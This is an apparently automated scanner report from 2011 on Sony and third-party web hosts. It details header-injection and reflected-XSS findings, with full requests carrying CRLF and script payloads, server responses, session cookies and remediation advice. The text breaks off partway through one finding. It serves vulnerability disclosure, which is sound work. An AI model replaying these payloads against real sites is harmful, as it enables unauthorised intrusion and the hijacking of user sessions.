XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06232011

Report generated by XSS.CX at Thu Jun 23 10:54:06 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Loading

1. HTTP header injection

1.1. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay [REST URL parameter 1]

1.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView [REST URL parameter 1]

1.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay [REST URL parameter 1]

1.4. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

2.2. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter]

2.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter]

2.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter]

2.5. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

2.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

2.7. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

3. SSL cookie without secure flag set

3.1. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

3.2. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

3.3. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

4. Session token in URL

4.1. http://sales.liveperson.net/hc/71737897/

4.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

4.3. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

5. Cookie scoped to parent domain

5.1. http://www.opensource.org/licenses/mit-license.php

5.2. http://solutions.liveperson.com/ref/lppb.asp

5.3. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

5.4. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

5.5. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

5.6. http://www.facebook.com/sonyelectronics

5.7. http://www.flickr.com/groups/sonycameraclub

5.8. http://www.flickr.com/groups/sonycameraclub/

6. Cookie without HttpOnly flag set

6.1. http://security.symantec.com/default.asp

6.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

6.3. http://solutions.liveperson.com/ref/lppb.asp

6.4. http://sony.storagesupport.com/

6.5. http://www.docs.sony.com/reflib/docget.asp

6.6. http://www.docs.sony.com/startchat.asp

6.7. http://www.opensource.org/licenses/mit-license.php

6.8. http://www.sonycreativesoftware.com/

6.9. http://sales.liveperson.net/hc/71737897/

6.10. http://sony.tcliveus.com/i

6.11. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

6.12. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

6.13. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

6.14. http://twitter.com/sonyoutletusa

6.15. http://us.playstation.com/psn/

6.16. http://www.facebook.com/sonyelectronics

6.17. http://www.flickr.com/groups/sonycameraclub

6.18. http://www.flickr.com/groups/sonycameraclub/

6.19. http://www.omnitechsupport.com/sony/index.php

6.20. http://www.sony.com/

6.21. http://www.sony.com/index.php

6.22. http://www.sony.com/storagemedia

6.23. http://www.sonystyle.com/

6.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

6.25. http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo

6.26. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

6.27. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

6.28. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

6.29. http://www.us.playstation.com/

6.30. http://www.us.playstation.com/Support

7. Password field with autocomplete enabled

7.1. http://twitter.com/sonyoutletusa

7.2. http://www.facebook.com/sonyelectronics

7.3. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

8. Referer-dependent response

9. Cross-domain POST

9.1. http://wiki.novemberborn.net/sifr3/DetectingCSSLoad

9.2. http://wiki.novemberborn.net/sifr3/JavaScript+Configuration

9.3. http://wiki.novemberborn.net/sifr3/JavaScript+Methods

9.4. http://wiki.novemberborn.net/sifr3/Styling

9.5. http://www.huddletogether.com/projects/lightbox2/

9.6. http://www.omnitechsupport.com/

9.7. http://www.omnitechsupport.com/

9.8. http://www.omnitechsupport.com/about.php

9.9. http://www.omnitechsupport.com/fee.php

9.10. http://www.omnitechsupport.com/fee.php

9.11. http://www.omnitechsupport.com/fee.php

9.12. http://www.omnitechsupport.com/fee.php

9.13. http://www.omnitechsupport.com/fee.php

9.14. http://www.omnitechsupport.com/fee.php

9.15. http://www.omnitechsupport.com/fee.php

9.16. http://www.omnitechsupport.com/fee.php

9.17. http://www.omnitechsupport.com/fee.php

9.18. http://www.omnitechsupport.com/fee.php

9.19. http://www.omnitechsupport.com/fee.php

9.20. http://www.omnitechsupport.com/fee.php

9.21. http://www.omnitechsupport.com/fee.php

9.22. http://www.omnitechsupport.com/spyware_removal.php

9.23. http://www.omnitechsupport.com/spyware_removal.php

10. Cross-domain Referer leakage

10.1. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

10.2. http://www.facebook.com/plugins/likebox.php

10.3. http://www.omnitechsupport.com/sony/index.php

10.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

10.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

10.6. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

10.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

10.8. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

10.9. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

10.10. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

10.11. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

10.12. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

11. Cross-domain script include

11.1. http://script.aculo.us/

11.2. http://twitter.com/sonyoutletusa

11.3. http://us.playstation.com/psn/

11.4. http://www.facebook.com/plugins/likebox.php

11.5. http://www.facebook.com/sonyelectronics

11.6. http://www.flickr.com/groups/sonycameraclub

11.7. http://www.flickr.com/groups/sonycameraclub/

11.8. http://www.huddletogether.com/projects/lightbox2/

11.9. http://www.omnitechsupport.com/about.php

11.10. http://www.omnitechsupport.com/spyware_removal.php

11.11. http://www.opensource.org/licenses/mit-license.php

11.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

11.13. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

11.14. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

11.15. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

11.16. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

11.17. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

11.18. http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog

11.19. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

11.20. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

12. TRACE method is enabled

13. Email addresses disclosed

13.1. http://www.flickr.com/groups/sonycameraclub

13.2. http://www.flickr.com/groups/sonycameraclub/

13.3. http://www.huddletogether.com/projects/lightbox2/

13.4. http://www.omnitechsupport.com/

13.5. http://www.omnitechsupport.com/about.php

13.6. http://www.omnitechsupport.com/fee.php

13.7. http://www.omnitechsupport.com/spyware_removal.php

13.8. http://www.opensource.org/licenses/mit-license.php

13.9. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

13.10. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

13.11. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

13.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

14. Private IP addresses disclosed

14.1. http://www.facebook.com/plugins/likebox.php

14.2. http://www.facebook.com/sonyelectronics

14.3. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

14.4. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

15. Robots.txt file

15.1. http://www.google-analytics.com/__utm.gif

15.2. http://www.googleadservices.com/pagead/conversion/1047459996/

15.3. http://www.omnitechsupport.com/sony/index.php

16. Cacheable HTTPS response

17. HTML does not specify charset

17.1. http://www.docs.sony.com/reflib/docget.asp

17.2. http://www.docs.sony.com/startchat.asp

17.3. http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx

17.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

17.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

17.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

17.7. https://www.websitealive5.com/favicon.ico

18. Content type incorrectly stated

18.1. http://sr2.liveperson.net/hcp/html/mTag.js

18.2. http://www.apache.org/licenses/LICENSE-2.0

18.3. http://www.docs.sony.com/reflib/docget.asp

18.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

18.5. https://www.websitealive5.com/favicon.ico

19. Content type is not specified

19.1. http://www.sonystyle.com/favicon.ico

19.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay



1. HTTP header injection  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b9c9%0d%0ad30a80f6707 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b9c9%0d%0ad30a80f6707/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/8b9c9
d30a80f6707
/wcs/stores/servlet/CategoryDisplay&catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M: esupport
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28059%0d%0a55571c41948 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28059%0d%0a55571c41948/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/28059
55571c41948
/wcs/stores/servlet/SYNewsletterOptInView&storeId=10151&catalogId=10551&langId=-1&XID=M: esupport
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a76d%0d%0aacf572565ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a76d%0d%0aacf572565ef/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; s_cc=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=85ddbc91e1d02d84452784d87f823ca75e46b2c7608495f34e035480db2332020de46713222f7b4ed69e61a0; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":1,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; mbox=check#true#1308841151|session#1308841090453-474854#1308842951|PC#1308841090453-474854.17#1310050710; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d
acf572565ef
/wcs/stores/servlet/StoreCatalogDisplay&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:18:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.4. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b1f95%0d%0a9bd0f0f51d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b1f95%0d%0a9bd0f0f51d9/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/b1f95
9bd0f0f51d9
/wcs/stores/servlet/CRMPortalHome&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.sonystyle.com/webapp/wcs/stores/ser
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 8c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697 was submitted in the msessionkey parameter. This input was echoed as 8c50e<img src=a onerror=alert(1)>3de729ec697 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=49162650217946299498c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=986859841504-958643907680&protV=20&lpjson=1&id=8121771027&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-general-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 15:17:23 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31206

lpConnLib.Process({"ResultSet": {"lpCallId":"986859841504-958643907680","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16101514677756'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

2.2. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonystyle.custhelp.com
Path:   /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73185"><script>alert(1)</script>86f752791d1 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source=73185"><script>alert(1)</script>86f752791d1 HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
RNT-Time: D=134191 t=1308842376214677
RNT-Machine: 09
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15137

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<input type="hidden" id="q_28_28" rows="3" cols="40" "text" name="q_28" value="73185"><script>alert(1)</script>86f752791d1" />
...[SNIP]...

2.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The value of the cmsId request parameter is copied into a JavaScript rest-of-line comment. The payload 63c67%0ac304ff0fa44 was submitted in the cmsId parameter. This input was echoed as 63c67
c304ff0fa44
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page63c67%0ac304ff0fa44&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72493
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -
...[SNIP]...
king
s.eVar8=''
// SQS tracking
var SQS = getURLParameter("SQS");
if (SQS == '') SQS = getURLParameter("sqs");
if (SQS != '') {
s.eVar9 = SQS;
}
// CMS Spot Tracking
s.eVar10=_cmsId;//'smb_landing_page63c67
c304ff0fa44
';
// Geo Segmentation City
s.eVar11=''
// Geo Segmentation State
s.eVar12=''
// Geo Segmentation Country
s.eVar13=''
// Coupon Tracking
s.eVar14=''
// Campaign Tracking
var campaign = getURLParameter(
...[SNIP]...

2.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 65bd4<script>alert(1)</script>d76e4a52225 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture65bd4<script>alert(1)</script>d76e4a52225&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
